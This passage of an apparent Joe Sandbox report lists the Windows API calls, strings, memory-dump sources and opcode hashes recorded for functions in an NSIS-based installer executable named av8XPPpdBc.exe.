                                                                                                                                                                                      • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                                                                      • MulDiv.KERNEL32(000AC5B9,00000064,000AC7BD), ref: 00402FE1
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                      • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                      • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                      • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                                                                      • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405EDF
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                        • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405F87
                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                      • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 3248276644-1895474628
                                                                                                                                                                                      • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                                                      • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1354259210-0
                                                                                                                                                                                      • Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                                                                                                                      • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                                                                                                                      • Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                      • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                      • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                      • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                                      • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                      • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                      • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                      • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                      • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                      • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                      • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 2655323295-1506623398
                                                                                                                                                                                      • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                                                                                                                      • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                                                                                                                                                      • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,C:\Users\user\AppData\Local\Temp\nswE27F.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\av8XPPpdBc.exe"), ref: 00405EDF
                                                                                                                                                                                      • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                      • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nswE27F.tmp, xrefs: 00405ED2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp
                                                                                                                                                                                      • API String ID: 3213498283-1506623398
                                                                                                                                                                                      • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                                                                                      • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                                                                                                                      • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 2659869361-3936084776
                                                                                                                                                                                      • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                      • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll), ref: 0040269A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nswE27F.tmp$C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll
                                                                                                                                                                                      • API String ID: 1659193697-3071547946
                                                                                                                                                                                      • Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                                                                                                                      • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                                                                                                                                                                      • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                      • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                      • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                                                                                                                        • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                      • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                      • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                                                                                                                      • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00406476
                                                                                                                                                                                      Strings
